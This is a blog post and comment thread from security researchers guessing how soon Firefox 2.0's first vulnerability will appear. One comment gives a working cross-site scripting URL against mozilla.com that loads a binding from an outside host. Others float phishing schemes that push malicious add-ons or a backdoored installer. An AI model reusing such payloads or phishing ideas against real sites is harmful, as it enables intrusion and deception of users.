On the heels of the Internet Explorer 7 release comes the much anticipated
Firefox 2.0, officially released tomorrow. Every new major browser release brings new interest from the security research community looking for greener pastures. In IE7 the
time-to-first-disclosed-vuln was under 24 hours. What do you think it'll be for FF2.0? I'll say
3 days; post your guess below.
18 comments:
48 hours.
48 hours.
I'll go with 5 days.. and zero for their website
http://www.mozilla.com/en-US/products/download.html?product=-%22%20style%3D%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss')%3bxx:expression(alert('XSS'))%22%3E%3Cx%20&os=1&lang=1
(easier to just click my name)
well nevermind, Blogger's a pain in multiple ways.. but you get the idea..
*points to:*
http://sla.ckers.org/forum/read.php?3,44,2090,page=21#msg-2090
Maluc, you rock...
Using that, you can potentially load .xpi through phishing... eesh!
I give it less than a week (and if I worked for Microsoft I'd make sure of that).
Never mind, you need to find one in addons.mozilla.org or update.mozilla.org, Maluc. At least if you want to be super sneaky.
heh, I'll see what I can do..
but in the meantime, sending phishing emails advertising Firefox 2 with links to mozilla that download a backdoored install file could work pretty well too. That's a badly worded sentence but you get the idea..
well.. I found one on addons.mozilla.org .. and persistent. But don't the victims still need to press the install button for them to be downloaded..? Also, the .xpi files look to be hosted on releases.mozilla.org
So it can definitely be used for phishing if they can be convinced to click install.. but I'm not sure about an automatic way
less than that: http://lcamtuf.coredump.cx/ffoxdie.html
The exploitable part of ffoxdie was fixed in the 1.5.0.7 release. What remains is a stack recursion crash due to an insanely deep XML tree.
You can annoy someone, but it does not appear exploitable. https://bugzilla.mozilla.org/show_bug.cgi?id=348514
Not that that's an excuse for leaving a highly publicised crash in the browser.
ffoxdie also affects IE7
What do you call a vuln? Do you simply mean security-related bugs, or must there be, for example, a code execution possibility?
Regards,
Sven
24 hours for 1st vuln disclosure
32 hours for 1st p0c
48 hours for 1st use of above vuln by phishers/spammers
52 hours for 1st moan by security blog
53 hours for 1st moan by nerd camp
Call me old, but history repeats itself when it comes to software :0)
Either is fine by me. No need to quibble over semantics.
Ok, let's start with something not so difficult. I've posted in my blog at www.disenchant.ch two ways someone can bypass the new phishing filter very easily.
I found these two ways in about 30 minutes, so it shouldn't be such a problem to find more ways.
PS:The first one isn't very interesting I know :P
Regards,
Sven
It seems like there was an anomaly in my Firefox. Option 2 will not work in the way I described in my blog. It's interesting anyway that the message saying it's a phishing site pops up about one second later than it does if you directly navigate to the same site. Sorry for the false alarm :(
4 days
- zeno